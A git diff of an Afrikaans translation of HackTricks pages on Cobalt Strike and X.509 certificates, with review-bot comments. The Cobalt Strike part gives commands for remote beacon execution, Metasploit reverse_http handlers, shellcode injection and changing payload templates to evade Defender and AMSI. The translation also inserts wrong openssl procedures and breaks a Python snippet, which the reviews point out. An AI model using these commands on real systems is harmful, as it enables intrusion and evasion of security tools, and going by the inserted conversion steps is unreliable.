+## winrm                     x86   Voer 'n PowerShell-skripsie uit via WinRM
+## winrm64                   x64   Voer 'n PowerShell-skripsie uit via WinRM
 
-remote-exec [method] [target] [command]
-## Methods:
-## psexec                          Remote execute via Service Control Manager
-## winrm                           Remote execute via WinRM (PowerShell)
-## wmi                             Remote execute via WMI
+remote-exec [metode] [teiken] [opdrag]
+## Metodes:
+## psexec                          Voer op afstand uit via die Diensbeheerder
+## winrm                           Voer op afstand uit via WinRM (PowerShell)
+## wmi                             Voer op afstand uit via WMI
 
-## To execute a beacon with wmi (it isn't ins the jump command) just upload the beacon and execute it
+## Om 'n beacon met wmi uit te voer (dit is nie in die jump-opdrag nie) laai net die beacon op en voer dit uit
 beacon> upload C:\Payloads\beacon-smb.exe
 beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe
 
 
-# Pass session to Metasploit - Through listener
-## On metaploit host
+# Gee sessie aan Metasploit - Deur middel van 'n luisteraar
+## Op Metasploit-gashuis
 msf6 > use exploit/multi/handler
 msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
 msf6 exploit(multi/handler) > set LHOST eth0
 msf6 exploit(multi/handler) > set LPORT 8080
 msf6 exploit(multi/handler) > exploit -j
 
-## On cobalt: Listeners > Add and set the Payload to Foreign HTTP. Set the Host to 10.10.5.120, the Port to 8080 and click Save.
+## Op cobalt: Luisteraars > Voeg by en stel die Payload in op Foreign HTTP. Stel die Host in op 10.10.5.120, die Poort op 8080 en klik op Stoor.
 beacon> spawn metasploit
-## You can only spawn x86 Meterpreter sessions with the foreign listener.
+## Jy kan slegs x86 Meterpreter-sessies spawn met die vreemde luisteraar.
 
-# Pass session to Metasploit - Through shellcode injection
-## On metasploit host
+# Gee sessie aan Metasploit - Deur middel van shellcode-injeksie
+## Op Metasploit-gashuis
 msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<IP> LPORT=<PORT> -f raw -o /tmp/msf.bin
-## Run msfvenom and prepare the multi/handler listener
+## Voer msfvenom uit en berei die multi/handler-luisteraar voor
 
-## Copy bin file to cobalt strike host
+## Kopieer binêre lêer na cobalt strike-gashuis
 ps
-shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process
+shinject <pid> x64 C:\Payloads\msf.bin #Injecteer Metasploit shellcode in 'n x64-proses
 
-# Pass metasploit session to cobalt strike
-## Fenerate stageless Beacon shellcode, go to Attacks > Packages > Windows Executable (S), select the desired listener, select Raw as the Output type and select Use x64 payload.
-## Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt srike shellcode
+# Gee Metasploit-sessie aan cobalt strike
+## Genereer stageless Beacon shellcode, gaan na Aanvalle > Pakkette > Windows Uitvoerbare lêer (S), kies die gewenste luisteraar, kies Raw as die Uitvoertipe en kies Gebruik x64-payload.
+## Gebruik post/windows/manage/shellcode_inject in Metasploit om die gegenereerde cobalt strike shellcode in te spuit
 
 
 # Pivoting
-## Open a socks proxy in the teamserver
+## Maak 'n sokkiesproksi oop in die spanbediener
 beacon> socks 1080
 
-# SSH connection
-beacon> ssh 10.10.17.12:22 username password
+# SSH-verbinding +beacon> ssh 10.10.17.12:22 gebruikersnaam wagwoord
-## Avoiding AVs +## Vermy AV's -### Artifact Kit +### Artefaktkit -Usually in `/opt/cobaltstrike/artifact-kit` you can find the code and pre-compiled templates (in `/src-common`) of the payloads that cobalt strike is going to use to generate the binary beacons. +Gewoonlik in `/opt/cobaltstrike/artifact-kit` kan jy die kode en vooraf saamgestelde sjablone (in `/src-common`) van die payloads vind wat cobalt strike gaan gebruik om die binêre beacons te genereer. -Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary. - -After modifying the code just run `./build.sh` from the same directory and copy the `dist-pipe/` folder into the Windows client in `C:\Tools\cobaltstrike\ArtifactKit`. +Deur [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) te gebruik met die gegenereerde agterdeur (of net met die saamgestelde sjabloon) kan jy vind wat verdediger aktiveer. Dit is gewoonlik 'n string. Jy kan dus net die kode wat die agterdeur genereer wysig sodat daardie string nie in die finale binêre lêer verskyn nie. +Nadat jy die kode gewysig het, voer jy net `./build.sh` uit vanuit dieselfde gids en kopieer die `dist-pipe/`-gids na die Windows-kliënt in `C:\Tools\cobaltstrike\ArtifactKit`. ``` pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe . ``` +Moenie vergeet om die aggressiewe skrip `dist-pipe\artifact.cna` te laai om aan te dui dat Cobalt Strike die hulpbronne vanaf die skyf moet gebruik wat ons wil hê en nie die een wat gelaai is nie. -Don't forget to load the aggressive script `dist-pipe\artifact.cna` to indicate Cobalt Strike to use the resources from disk that we want and not the ones loaded. 
+### Hulpbronpakket -### Resource Kit - -The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA. - -Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the templates you can find what is defender (AMSI in this case) not liking and modify it: +Die Hulpbronpakket-vouer bevat die sjablone vir Cobalt Strike se skripsgebaseerde vragte, insluitend PowerShell, VBA en HTA. +Deur [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) saam met die sjablone te gebruik, kan jy vind wat die verdediger (AMSI in hierdie geval) nie wil hê nie en dit wysig: ``` .\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1 ``` +### Verander die opgespoorde lyne sodat jy 'n sjabloon kan genereer wat nie opgemerk sal word nie. -Modifying the detected lines one can generate a template that won't be caught. - -Don't forget to load the aggressive script `ResourceKit\resources.cna` to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded. - - - - - - - +Moenie vergeet om die aggressiewe skrip `ResourceKit\resources.cna` te laai om aan te dui dat Cobalt Strike die hulpbronne vanaf die skyf moet gebruik wat ons wil hê en nie die een wat gelaai is nie. ```bash cd C:\Tools\neo4j\bin neo4j.bat console @@ -233,3 +222,4 @@ pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe . ``` + diff --git a/cryptography/certificates.md b/cryptography/certificates.md index ee0644afb..a085606d1 100644 --- a/cryptography/certificates.md +++ b/cryptography/certificates.md @@ -1,59 +1,58 @@ -# Certificates +# Sertifikate
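Review bot: In the cobalt-strike.md hunk the translation alters command lines and product names that should stay verbatim. `C:\path\Rubeus.exe` becomes `C:\pad\Rubeus.exe` in the `createnetonly` and `ptt` lines while the `asktgt`, `triage` and `dump` lines above keep `C:\path\`, so one snippet now mixes two placeholders; `[...base64-ticket...]` is translated while `[...ticket...]` earlier is not. Cobalt Strike's UI and feature names are English-only in the product, so `Listeners > Add`, `Save`, `Attacks > Packages > Windows Executable (S)`, `Raw`, `Use x64 payload`, the `Foreign` listener (rendered as "vreemde luisteraar") and `Service Control Manager` ("Diensbeheerder") should be kept as written. "sokkiesproksi" should be "SOCKS-proxy" (SOCKS is a protocol name, not the garment) and "gashuis" (guesthouse) should be "gasheer" wherever "host" is meant. "Defender" refers to the Microsoft Defender product and should not become the common noun "verdediger", and `.cna` files are Aggressor Script, so "aggressiewe skrip" carries a mistranslation over from the source. Finally, "Modifying the detected lines one can generate a template that won't be caught." is a paragraph in the original but becomes a `###` heading in the `+` line; keep it as a paragraph.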
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloei** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## What is a Certificate +## Wat is 'n Sertifikaat -A **public key certificate** is a digital ID used in cryptography to prove someone owns a public key. It includes the key's details, the owner's identity (the subject), and a digital signature from a trusted authority (the issuer). If the software trusts the issuer and the signature is valid, secure communication with the key's owner is possible. +'n **Openbare sleutel sertifikaat** is 'n digitale ID wat in kriptografie gebruik word om te bewys dat iemand 'n openbare sleutel besit. Dit sluit die sleutel se besonderhede, die eienaar se identiteit (die onderwerp), en 'n digitale handtekening van 'n vertroude gesag (die uitreiker) in. As die sagteware die uitreiker vertrou en die handtekening geldig is, is veilige kommunikasie met die sleutel se eienaar moontlik. -Certificates are mostly issued by [certificate authorities](https://en.wikipedia.org/wiki/Certificate_authority) (CAs) in a [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) setup. Another method is the [web of trust](https://en.wikipedia.org/wiki/Web_of_trust), where users directly verify each other’s keys. The common format for certificates is [X.509](https://en.wikipedia.org/wiki/X.509), which can be adapted for specific needs as outlined in RFC 5280. 
+Sertifikate word meestal uitgereik deur [sertifikaatowerhede](https://en.wikipedia.org/wiki/Certificate_authority) (SO's) in 'n [openbare sleutel infrastruktuur](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) opset. 'n Ander metode is die [web van vertroue](https://en.wikipedia.org/wiki/Web_of_trust), waar gebruikers mekaar se sleutels direk verifieer. Die algemene formaat vir sertifikate is [X.509](https://en.wikipedia.org/wiki/X.509), wat aangepas kan word vir spesifieke behoeftes soos uiteengesit in RFC 5280. -## x509 Common Fields +## x509 Algemene Velde -### **Common Fields in x509 Certificates** +### **Algemene Velde in x509 Sertifikate** -In x509 certificates, several **fields** play critical roles in ensuring the certificate's validity and security. Here's a breakdown of these fields: +In x509 sertifikate speel verskeie **velde** 'n kritieke rol om die geldigheid en veiligheid van die sertifikaat te verseker. Hier is 'n uiteensetting van hierdie velde: -- **Version Number** signifies the x509 format's version. -- **Serial Number** uniquely identifies the certificate within a Certificate Authority's (CA) system, mainly for revocation tracking. -- The **Subject** field represents the certificate's owner, which could be a machine, an individual, or an organization. It includes detailed identification such as: - - **Common Name (CN)**: Domains covered by the certificate. - - **Country (C)**, **Locality (L)**, **State or Province (ST, S, or P)**, **Organization (O)**, and **Organizational Unit (OU)** provide geographical and organizational details. - - **Distinguished Name (DN)** encapsulates the full subject identification. -- **Issuer** details who verified and signed the certificate, including similar subfields as the Subject for the CA. -- **Validity Period** is marked by **Not Before** and **Not After** timestamps, ensuring the certificate is not used before or after a certain date. 
-- The **Public Key** section, crucial for the certificate's security, specifies the algorithm, size, and other technical details of the public key. -- **x509v3 extensions** enhance the certificate's functionality, specifying **Key Usage**, **Extended Key Usage**, **Subject Alternative Name**, and other properties to fine-tune the certificate's application. +- **Weergawenommer** dui die weergawe van die x509-formaat aan. +- **Serienommer** identifiseer die sertifikaat uniek binne 'n Sertifikaatowerheid (SO) se stelsel, hoofsaaklik vir herroepingstracking. +- Die **Onderwerp**-veld verteenwoordig die eienaar van die sertifikaat, wat 'n masjien, 'n individu, of 'n organisasie kan wees. Dit sluit gedetailleerde identifikasie in soos: +- **Gemeenskaplike Naam (CN)**: Domeine wat deur die sertifikaat gedek word. +- **Land (C)**, **Ligging (L)**, **Staat of Provinsie (ST, S, of P)**, **Organisasie (O)**, en **Organisasie-eenheid (OU)** verskaf geografiese en organisatoriese besonderhede. +- **Onderskeidende Naam (DN)** sluit die volledige onderwerpidentifikasie in. +- **Uitreiker** besonderhede van wie die sertifikaat geverifieer en onderteken het, insluitend soortgelyke subvelde as die Onderwerp vir die SO. +- **Geldigheidsperiode** word aangedui deur **Nie Voor** en **Nie Na** tydstempels, wat verseker dat die sertifikaat nie voor of na 'n sekere datum gebruik word nie. +- Die **Openbare Sleutel**-afdeling, wat krities is vir die veiligheid van die sertifikaat, spesifiseer die algoritme, grootte, en ander tegniese besonderhede van die openbare sleutel. +- **x509v3-uitbreidings** verbeter die funksionaliteit van die sertifikaat deur **Sleutelgebruik**, **Uitgebreide Sleutelgebruik**, **Alternatiewe Naam van Onderwerp**, en ander eienskappe te spesifiseer om die toepassing van die sertifikaat fynaf te stel. -#### **Key Usage and Extensions** - -- **Key Usage** identifies cryptographic applications of the public key, like digital signature or key encipherment. 
-- **Extended Key Usage** further narrows down the certificate's use cases, e.g., for TLS server authentication. -- **Subject Alternative Name** and **Basic Constraint** define additional host names covered by the certificate and whether it's a CA or end-entity certificate, respectively. -- Identifiers like **Subject Key Identifier** and **Authority Key Identifier** ensure uniqueness and traceability of keys. -- **Authority Information Access** and **CRL Distribution Points** provide paths to verify the issuing CA and check certificate revocation status. -- **CT Precertificate SCTs** offer transparency logs, crucial for public trust in the certificate. +#### **Sleutelgebruik en Uitbreidings** +- **Sleutelgebruik** identifiseer kriptografiese toepassings van die openbare sleutel, soos digitale handtekening of sleutelversleuteling. +- **Uitgebreide Sleutelgebruik** versmalle verder die gebruiksmoontlikhede van die sertifikaat, bv. vir TLS-bedienerverifikasie. +- **Alternatiewe Naam van Onderwerp** en **Basiese Beperking** definieer addisionele gasheernaam wat deur die sertifikaat gedek word en of dit 'n SO- of eindentiteit-sertifikaat is, onderskeidelik. +- Identifiseerders soos **Sleutelidentifiseerder van Onderwerp** en **Sleutelidentifiseerder van Gesag** verseker uniekheid en naspeurbaarheid van sleutels. +- **Gesaginligtings Toegang** en **CRL Verspreidingspunte** verskaf paaie om die uitreikende SO te verifieer en die sertifikaat-herroepingsstatus te kontroleer. +- **CT Voor-sertifikaat SCT's** bied deursigtigheidslêers, wat krities is vir openbare vertroue in die sertifikaat. ```python # Example of accessing and using x509 certificate fields programmatically: from cryptography import x509 
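Review bot: In the first certificates.md hunk the abbreviation for certificate authority is inconsistent: "(SO's)" is introduced here and "SO-" reused in the Basic Constraint bullet, while the Certificate Transparency hunk below keeps "CA's"; pick one, and keeping "CA" is safer because every tool and RFC uses it. The nested bullets under Subject ("Common Name (CN)", "Country (C), Locality (L) ...", "Distinguished Name (DN)") lose their indentation in the `+` lines and become top-level items, which changes the list structure. "deursigtigheidslêers" (transparency files) for "transparency logs" should be "logboeke" or "joernale", matching "Sertifikaatjoernale" used in the next hunk.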
@@ -61,8 +60,8 @@ from cryptography.hazmat.backends import default_backend # Load an x509 certificate (assuming cert.pem is a certificate file) with open("cert.pem", "rb") as file: - cert_data = file.read() - certificate = x509.load_pem_x509_certificate(cert_data, default_backend()) +cert_data = file.read() +certificate = x509.load_pem_x509_certificate(cert_data, default_backend()) # Accessing fields serial_number = certificate.serial_number 
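Review bot: This hunk breaks the Python example: `cert_data = file.read()` and `certificate = x509.load_pem_x509_certificate(cert_data, default_backend())` are the body of the `with open("cert.pem", "rb") as file:` block, and the `+` lines strip their indentation, leaving the `with` statement without a body so the snippet raises IndentationError. The text of both lines is otherwise identical to the `-` lines, so drop this hunk entirely; code inside fences should not be touched by a translation pass.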
@@ -75,139 +74,180 @@ print(f"Issuer: {issuer}") print(f"Subject: {subject}") print(f"Public Key: {public_key}") ``` +### **Verskil tussen OCSP en CRL-verspreidingspunte** -### **Difference between OCSP and CRL Distribution Points** +**OCSP** (**RFC 2560**) behels 'n kliënt en 'n responder wat saamwerk om te kontroleer of 'n digitale openbare sleutelsertifikaat herroep is, sonder om die volledige **CRL** af te laai. Hierdie metode is doeltreffender as die tradisionele **CRL**, wat 'n lys van herroepingsertifikaatserienommers verskaf, maar 'n potensieel groot lêer vereis om af te laai. CRL's kan tot 512 inskrywings insluit. Meer besonderhede is beskikbaar [hier](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm). -**OCSP** (**RFC 2560**) involves a client and a responder working together to check if a digital public-key certificate has been revoked, without needing to download the full **CRL**. This method is more efficient than the traditional **CRL**, which provides a list of revoked certificate serial numbers but requires downloading a potentially large file. CRLs can include up to 512 entries. More details are available [here](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm). +### **Wat is Sertifikaattransparansie** -### **What is Certificate Transparency** +Sertifikaattransparansie help om sertifikaatverwante bedreigings te beveg deur te verseker dat die uitreiking en bestaan van SSL-sertifikate sigbaar is vir domeineienaars, CA's en gebruikers. Die doelstellings is as volg: -Certificate Transparency helps combat certificate-related threats by ensuring the issuance and existence of SSL certificates are visible to domain owners, CAs, and users. Its objectives are: +* Voorkoming dat CA's SSL-sertifikate vir 'n domein uitreik sonder die domeineienaar se kennis. 
+* Daarstel van 'n oop ouditeringstelsel vir die opspoor van per abuis of booswillig uitgereikte sertifikate. +* Beskerming van gebruikers teen valse sertifikate. -* Preventing CAs from issuing SSL certificates for a domain without the domain owner's knowledge. -* Establishing an open auditing system for tracking mistakenly or maliciously issued certificates. -* Safeguarding users against fraudulent certificates. +#### **Sertifikaatjoernale** -#### **Certificate Logs** +Sertifikaatjoernale is openbaar ouditeerbare, net byvoegbare rekords van sertifikate wat deur netwerkdienste onderhou word. Hierdie joernale verskaf kriptografiese bewyse vir ouditeringsdoeleindes. Beide uitreikingsowerhede en die publiek kan sertifikate na hierdie joernale indien of dit ondersoek vir verifikasie. Alhoewel die presiese aantal joernaalbedieners nie vasstaan nie, word verwag dat dit wêreldwyd minder as 'n duisend sal wees. Hierdie bedieners kan onafhanklik deur CA's, ISP's of enige belanghebbende entiteit bestuur word. -Certificate logs are publicly auditable, append-only records of certificates, maintained by network services. These logs provide cryptographic proofs for auditing purposes. Both issuance authorities and the public can submit certificates to these logs or query them for verification. While the exact number of log servers is not fixed, it's expected to be less than a thousand globally. These servers can be independently managed by CAs, ISPs, or any interested entity. +#### **Ondersoek** -#### **Query** +Om Sertifikaattransparansiejoernale vir enige domein te ondersoek, besoek [https://crt.sh/](https://crt.sh). -To explore Certificate Transparency logs for any domain, visit [https://crt.sh/](https://crt.sh). +Verskillende formate bestaan vir die stoor van sertifikate, elk met sy eie gebruiksscenario's en verenigbaarheid. Hierdie opsomming dek die belangrikste formate en bied leiding oor die omskakeling tussen hulle. 
-Different formats exist for storing certificates, each with its own use cases and compatibility. This summary covers the main formats and provides guidance on converting between them. +## **Formate** -## **Formats** +### **PEM-formaat** +- Die mees algemeen gebruikte formaat vir sertifikate. +- Vereis afsonderlike lêers vir sertifikate en privaatsleutels, gekodeer in Base64 ASCII. +- Gewone uitbreidings: .cer, .crt, .pem, .key. +- Primêr gebruik deur Apache en soortgelyke bedieners. -### **PEM Format** -- Most widely used format for certificates. -- Requires separate files for certificates and private keys, encoded in Base64 ASCII. -- Common extensions: .cer, .crt, .pem, .key. -- Primarily used by Apache and similar servers. +### **DER-formaat** +- 'n Binêre formaat van sertifikate. +- Ontbreek die "BEGIN/END CERTIFICATE"-verklarings wat in PEM-lêers gevind word. +- Gewone uitbreidings: .cer, .der. +- Word dikwels gebruik met Java-platforms. -### **DER Format** -- A binary format of certificates. -- Lacks the "BEGIN/END CERTIFICATE" statements found in PEM files. -- Common extensions: .cer, .der. -- Often used with Java platforms. +### **P7B/PKCS#7-formaat** +- Gestoor in Base64 ASCII, met uitbreidings .p7b of .p7c. +- Bevat slegs sertifikate en kettingsertifikate, sonder die privaatsleutel. +- Ondersteun deur Microsoft Windows en Java Tomcat. -### **P7B/PKCS#7 Format** -- Stored in Base64 ASCII, with extensions .p7b or .p7c. -- Contains only certificates and chain certificates, excluding the private key. -- Supported by Microsoft Windows and Java Tomcat. +### **PFX/P12/PKCS#12-formaat** +- 'n Binêre formaat wat bedienersertifikate, tussenliggende sertifikate en privaatsleutels in een lêer inkapsuleer. +- Uitbreidings: .pfx, .p12. +- Hoofsaaklik gebruik op Windows vir die invoer en uitvoer van sertifikate. -### **PFX/P12/PKCS#12 Format** -- A binary format that encapsulates server certificates, intermediate certificates, and private keys in one file. 
-- Extensions: .pfx, .p12. -- Mainly used on Windows for certificate import and export. +### **Omskakeling van Formate** -### **Converting Formats** - -**PEM conversions** are essential for compatibility: - -- **x509 to PEM** +**PEM-omskakelings** is noodsaaklik vir verenigbaarheid: +- **x509 na PEM** ```bash openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem ``` +- **PEM na DER** +PEM (Privacy-Enhanced Mail) en DER (Distinguished Encoding Rules) is twee verskillende formaatstandaarde vir sertifikate. PEM is 'n Base64-gekodeerde formaat wat gewoonlik gebruik word vir die stoor en oordrag van sertifikate. DER is 'n binêre formaat wat gebruik word vir die verwerking van sertifikate deur programme. -- **PEM to DER** +Om 'n PEM-sertifikaat na DER-formaat om te skakel, kan die volgende opdrag gebruik word: + +```bash +openssl x509 -in certificate.pem -outform der -out certificate.der +``` + +Hierdie opdrag sal die PEM-sertifikaat wat in die `certificate.pem`-lêer gestoor is, omskakel na DER-formaat en dit in die `certificate.der`-lêer stoor. ```bash openssl x509 -outform der -in certificatename.pem -out certificatename.der ``` +- **DER na PEM** +Om 'n DER-sertifikaat na PEM-formaat om te skakel, kan die volgende stappe gevolg word: -- **DER to PEM** +1. Gebruik die OpenSSL-hulpmiddel om die DER-sertifikaat te ontleed en die openbare sleutel daaruit te verkry: + + ```plaintext + openssl x509 -inform der -in certificate.der -pubkey -noout > public_key.pem + ``` + +2. Gebruik die OpenSSL-hulpmiddel om die DER-sertifikaat na PEM-formaat om te skakel: + + ```plaintext + openssl x509 -inform der -in certificate.der -out certificate.pem + ``` + +Die DER-sertifikaat sal nou suksesvol na PEM-formaat omgeskakel word. ```bash openssl x509 -inform der -in certificatename.der -out certificatename.pem ``` +- **PEM na P7B** -- **PEM to P7B** +Om 'n PEM-sertifikaatlêer na 'n P7B-formaat om te skakel, kan die volgende stappe gevolg word: + +1. 
Maak 'n nuwe tekslêer en kopieer die inhoud van die PEM-lêer daarin. +2. Verander die lêernaam na 'n .p7b-lêeruitbreiding. +3. Stoor die lêer en dit sal nou in die P7B-formaat wees. + +Dit is belangrik om daarop te let dat die P7B-formaat 'n binêre formaat is en nie die sertifikaat se privaat sleutel bevat nie. Die P7B-lêer bevat slegs die sertifikaatketting. ```bash openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer ``` +- **PKCS7 na PEM** +Om 'n PKCS7-sertifikaat na PEM-formaat om te skakel, kan die volgende stappe gevolg word: -- **PKCS7 to PEM** +1. Skep 'n nuwe tekslêer en kopieer die inhoud van die PKCS7-sertifikaat daarin. +2. Verwyder enige lynafbrekings of wit spasies in die tekslêer. +3. Voeg die volgende lyn by die begin van die tekslêer: `-----BEGIN PKCS7-----`. +4. Voeg die volgende lyn by die einde van die tekslêer: `-----END PKCS7-----`. +5. Stoor die tekslêer met die `.pem`-lêeruitbreiding. + +Die PKCS7-sertifikaat is nou suksesvol omgeskakel na PEM-formaat. ```bash openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.pem ``` +**PFX-omskakelings** is noodsaaklik vir die bestuur van sertifikate op Windows: - -**PFX conversions** are crucial for managing certificates on Windows: - -- **PFX to PEM** +- **PFX na PEM** ```bash openssl pkcs12 -in certificatename.pfx -out certificatename.pem ``` - - -- **PFX to PKCS#8** involves two steps: - 1. Convert PFX to PEM - +- **PFX na PKCS#8** behels twee stappe: +1. Omskakel PFX na PEM ```bash openssl pkcs12 -in certificatename.pfx -nocerts -nodes -out certificatename.pem ``` +2. Omskep PEM na PKCS8 - 2. Convert PEM to PKCS8 +Om 'n PEM-sertifikaat na PKCS8-formaat om te skakel, kan jy die volgende stappe volg: + +1. Installeer die OpenSSL-hulpmiddel as dit nog nie op jou stelsel geïnstalleer is nie. +2. Open 'n opdragvenster en navigeer na die plek waar die PEM-sertifikaat geleë is. +3. 
Voer die volgende opdrag in om die PEM-sertifikaat na PKCS8-formaat om te skakel: + + ```plaintext + openssl pkcs8 -topk8 -inform PEM -outform DER -in private.pem -out private.pk8 -nocrypt + ``` + + Hier moet jy die korrekte naam van die PEM-sertifikaat vervang met die naam van jou eie sertifikaat. + +4. Nadat die opdrag suksesvol uitgevoer is, sal jy 'n nuwe PKCS8-sertifikaat met die naam "private.pk8" hê. + +Met hierdie stappe kan jy 'n PEM-sertifikaat na PKCS8-formaat omskep. ```bash openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8 ``` - - -- **P7B to PFX** also requires two commands: - 1. Convert P7B to CER +- **P7B na PFX** vereis ook twee opdragte: +1. Omskakel P7B na CER ```bash openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer ``` - - 2. Convert CER and Private Key to PFX +2. Omskep CER en Privaatsleutel na PFX ```bash openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer ``` - ***
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
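Review bot: This hunk adds material that is not a translation of the source, and several of the additions are technically wrong, so they should be removed to keep the PR a pure translation. The added "PEM na P7B" steps say to copy the PEM file, rename it to `.p7b` and save, which does not produce a PKCS#7 structure (the `openssl crl2pkcs7` command directly below is the actual conversion), and they call P7B a binary format, contradicting the "P7B/PKCS#7-formaat" section above that correctly says Base64 ASCII. The added "PKCS7 na PEM" steps (strip line breaks, add `-----BEGIN PKCS7-----`/`-----END PKCS7-----`) are likewise invented; `openssl pkcs7 -print_certs` is the real step. The "DER na PEM" addition inserts an unneeded `-pubkey -noout` extraction step, the "PEM na DER" addition duplicates the existing command with different file names, and the "PEM na PKCS8" addition describes `openssl pkcs8 -topk8 ... -out private.pk8` as producing a "PKCS8-sertifikaat" when PKCS#8 is a private-key format. Separately, the numbered sub-steps under "PFX na PKCS#8" and "P7B na PFX" lose their indentation and become top-level items, and the footer's "github-opslag" does not match "github-repositoriums" in this file's header hunk; the shared banner should be translated identically everywhere.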
